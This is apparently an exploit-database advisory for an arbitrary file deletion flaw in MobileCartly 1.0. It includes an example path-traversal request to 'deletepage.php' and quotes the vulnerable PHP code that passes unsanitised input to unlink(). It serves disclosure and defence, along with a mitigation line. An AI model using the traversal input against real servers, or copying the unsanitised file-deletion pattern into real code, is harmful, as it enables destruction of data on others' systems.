header-logo
Suggest Exploit
vendor:
MobileCartly
by:
GoLd_M
7,5
CVSS
HIGH
Arbitrary Delete Vulnerability
20
CWE
Product Name: MobileCartly
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:mobilecartly:mobilecartly:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2
2012

MobileCartly 1.0 <= Arbitrary Delete Vulnerability

The MobileCartly 1.0 application is vulnerable to an arbitrary delete vulnerability. The vulnerability exists in the 'deletepage.php' file, which allows an attacker to delete any file on the server by passing the file path in the 'deletepage' parameter. This can be exploited to delete any file on the server.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in file operations.
Source

Exploit-DB raw data:

# Exploit Title: MobileCartly 1.0 <= Arbitrary Delete Vulnerability
# Date: 09/08/2012
# Author: GoLd_M
# Vendor or Software Link: http://mobilecartly.com/mobilecartly.zip
# Version: 1.0
# Category:: Arbitrary Delete Vulnerability
# Google dork: :(
# Tested on: Xp SP 2
# Ex : 	[MobileCartly 1.0]/includes/deletepage.php?deletepage=../[File]
# Code Page /includes/deletepage.php
# <?
#
# $page = "../pages/" . $_REQUEST['deletepage']; <<---XXX
#
# unlink($page); <<---XXX[Booooom]
#
#
# ?>